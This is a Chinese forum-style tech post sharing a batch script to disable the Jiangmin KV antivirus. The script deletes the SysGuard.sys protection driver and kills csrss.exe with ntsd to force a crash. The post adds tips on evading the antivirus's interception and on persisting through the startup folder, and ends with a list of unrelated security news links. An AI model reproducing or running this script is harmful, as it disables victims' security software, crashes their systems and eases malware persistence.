很XX，高手飄過(guò)...

今早起來(lái)一邊早飯一邊試驗(yàn)的。代碼見(jiàn)下：

@echo off
del %systemroot%\system32\drivers\SysGuard.sys /f /q /s
set app_name=csrss.exe
echo 查找進(jìn)程%app_name%,準(zhǔn)備死機(jī)...
(tasklist /nh | findstr /i %app_name%) || (goto dead)
:dead
ntsd -c -q -pn %app_name%

原理我自己也不是太明白就不多說(shuō)了，實(shí)驗(yàn)結(jié)果好像管用，我用虛擬機(jī)和真實(shí)機(jī)都分別試驗(yàn)了下，還不錯(cuò)。直接點(diǎn)的批處理腳本，如果轉(zhuǎn)成EXE效果不保證了(沒(méi)有實(shí)驗(yàn))。但是由于有關(guān)機(jī)回寫，必須強(qiáng)迫死機(jī)，雖然重啟后KV的變態(tài)進(jìn)程守護(hù)不管用了(可以用任務(wù)管理器試試)，但是在重啟之前你還得把善后工作做好，準(zhǔn)備來(lái)日重生。有幾點(diǎn)得注意：

1、不能直接用批處理寫注冊(cè)表(雖然可以還原SSDT之后用API寫，但是不是我們追求的純粹R3手段)
2、最好不要把bat放在EXE里，因?yàn)檫\(yùn)行時(shí)KV十有八九可以攔截到
3、最好的地方可能是啟動(dòng)文件夾，或許還有些其他修改手段

的確是個(gè)很娛樂(lè)且沒(méi)有什么實(shí)用價(jià)值的手段...大家可以?shī)蕵?lè)下，不過(guò)考慮到每個(gè)人的機(jī)子效果或許不同，不用報(bào)有太大希望。

特別強(qiáng)調(diào)：KV08/09用戶，試驗(yàn)時(shí)一定要把C:\Windows\system32\drivers\SysGuard.sys拷貝個(gè)到其它地方備份，如果本實(shí)驗(yàn)真的成功了，KV就實(shí)效了。只有拷貝回去下次重啟即可恢復(fù)，或者重新安裝。

【編輯推薦】

1. 《X戰(zhàn)警前傳》提前泄露 FBI怒抄0day組織大本營(yíng)
2. 徹底無(wú)處可逃：研究人員展示BIOS級(jí)底層安全攻擊
3. 美女黑客曝英特爾CPU漏洞或引發(fā)全球用戶恐慌
4. 安全專家詳談：對(duì)付惡意軟件的策略及方法
5. 51CTO記者親歷：尤金.卡巴斯基開(kāi)啟2009中國(guó)安全行